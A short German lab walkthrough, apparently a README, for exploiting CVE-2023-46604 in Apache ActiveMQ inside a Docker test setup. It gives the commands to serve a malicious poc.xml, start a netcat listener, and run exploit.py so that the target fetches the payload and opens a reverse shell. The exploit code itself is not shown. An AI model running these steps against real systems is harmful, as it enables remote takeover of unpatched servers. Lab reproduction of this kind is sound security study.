
Exploit für CVE-2023-46604 in Apache ActiveMQ, der Remote-Codeausführung über manipulierte XML-Payloads und Reverse-Shell-Einrichtung ermöglicht.
CVE-2023-46604

Erstellen Sie ein Docker-Compose mit zwei Images: dem Opferrechner und dem Zielrechner, entsprechend der erforderlichen Umgebung. Starten Sie auf dem Opferrechner ActiveMQ.
Wechseln Sie zum Angreiferrechner: • Öffnen Sie einen HTTP-Dienst, um den PoC zu senden: python3 -m http.server
• Verwenden Sie Netcat, um auf eine Verbindung zum Angreiferrechner zu lauschen: nc -nlvp 4444
• Senden Sie das Payload, um eine Reverse-Shell-Verbindung zum Angreiferrechner herzustellen: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Dabei:
Man kann sehen, dass nach der Ausführung des Befehls zum Starten der Datei 'exploit.py' der Exploit-Code ein Paket 'poc.xml' vom Webserver an das Ziel sendet, also an die Adresse des auf dem Zielserver laufenden ActiveMQ-Dienstes. Gleichzeitig erhält der HTTP-Webserver auf dem Angreiferrechner eine Anfrage von der IP-Adresse des Zielrechners.
Nach dem Senden des Payloads wechselt man zum Terminal, das auf Port 4444 des Angreiferrechners lauscht. Man sieht, dass die Reverse-Shell des Opferrechners eingegangen ist.